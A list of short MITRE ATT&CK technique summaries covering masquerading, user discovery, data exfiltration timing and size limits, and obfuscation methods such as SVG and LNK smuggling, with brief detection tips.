[T1036 ] Masquerading – Adversaries alter file names, locations, metadata, or service/task identifiers to appear legitimate and evade detection, often using subtle tricks like Unicode overrides or fake extensions to fool users and tools. #Masquerading #DefenseEvasion
Category: MITRE
[T1033 ] System Owner/User Discovery – Adversaries probe systems to identify who owns or is using a device to guide next steps, such as privilege escalation or targeted lateral movement. Knowing active users helps attackers choose tailored actions and avoid noisy behavior. #SystemOwnerDiscovery #UserDiscovery
[T1030 ] Data Transfer Size Limits – Attackers may split stolen data into many small, fixed-size chunks or limit packet sizes to slip under network transfer thresholds and alerts. Monitoring for unusual asymmetric flows, regular small-packet patterns, and new network-using processes helps spot this exfiltration method. #DataExfiltration #NetworkSecurity
[T1029 ] Scheduled Transfer – Scheduled transfer is when attackers time data exfiltration to occur at predictable times or intervals to blend with normal activity and avoid detection. It often pairs with other exfiltration methods like C2 channels or alternative protocols to move data out stealthily. #ScheduledTransfer #DataExfiltration
[T1027.017 ] Obfuscated Files or Information: SVG Smuggling – SVG smuggling hides malicious JavaScript or payloads inside seemingly harmless SVG image files to bypass content filters and fool users, enabling delivery of malware, credential theft, or redirects to malicious sites. #SVGSmuggling #DefenseEvasion
[T1027.016 ] Obfuscated Files or Information: Junk Code Insertion – Junk or dead code is added to malware to hide real functionality and slow analysis, often combined with packing or compression to evade static detection. #JunkCodeInsertion #DefenseEvasion
[T1027.015 ] Obfuscated Files or Information: Compression – Adversaries compress and archive payloads (ZIP, gzip, 7z, RAR, self-extracting archives) or compress shellcode to hide malicious content and ease transfer. Attackers may concatenate archives or password-protect/encrypt compressed files to evade scanners and trick users into extracting and executing malware. #Compression #DefenseEvasion
[T1027.014 ] Obfuscated Files or Information: Polymorphic Code – Polymorphic code mutates its form on each execution to avoid signature-based detection, allowing malware to persist across Windows, Linux, and macOS environments by changing file content, metadata, or runtime behaviors. Detection requires behavior-based telemetry, file and application logs, and endpoint monitoring to spot anomalies in creation patterns, execution profiles, and mutation engine activity. #PolymorphicCode #DefenseEvasion
[T1027.013 ] Obfuscated Files or Information: Encrypted/Encoded File – Adversaries encrypt or encode files to hide malicious content from signature and pattern-based defenses, often using layered encodings, password-protected archives, or custom schemes to delay discovery until execution. #ObfuscatedFiles #DefenseEvasion
[T1027.012 ] Obfuscated Files or Information: LNK Icon Smuggling – LNK Icon Smuggling hides download commands inside Windows shortcut (.LNK) metadata, allowing adversaries to bypass filters and fetch malicious payloads when the shortcut is opened or executed. This technique is used in phishing and post-compromise stages to stage additional malware without obvious executable files. #LNKIconSmuggling #DefenseEvasion
[T1027.011 ] Obfuscated Files or Information: Fileless Storage – Adversaries hide code and stolen data in non-file locations like the Windows Registry, WMI repository, event logs, or Linux shared memory to evade disk-based defenses and persist covertly. Monitor volatile stores and central OS repositories to detect hidden artifacts and abnormal usage patterns. #FilelessStorage #DefenseEvasion
[T1027.010 ] Obfuscated Files or Information: Command Obfuscation – Command obfuscation hides malicious intent in CLI and script strings to evade detection and forensic analysis. Watch for unusual encodings, escape characters, string concatenation, and directory-traversal tricks that preserve functionality while defeating signatures. #CommandObfuscation #DefenseEvasion
[T1027.009 ] Obfuscated Files or Information: Embedded Payloads – Adversaries hide malicious modules inside otherwise benign files to evade detection, enabling stealthy execution and persistence. Protect systems by monitoring file changes, validating signatures, and inspecting uncommon file overlays. #EmbeddedPayloads #DefenseEvasion
[T1027.008 ] Obfuscated Files or Information: Stripped Payloads – Adversaries remove human-readable symbols and strings from binaries and scripts to hinder analysis and evade detection. Stripped payloads reduce useful metadata and make automated scanning and manual reverse engineering harder. #StrippedBinaries #DefenseEvasion
[T1027.007 ] Obfuscated Files or Information: Dynamic API Resolution – Dynamic API resolution hides which OS functions malware will call until runtime, defeating static inspection and altering file signatures to evade detection. Monitor module loads, suspicious GetProcAddress/LoadLibrary patterns, and unusual string-hash usage to spot this behavior. #DynamicAPIResolution #DefenseEvasion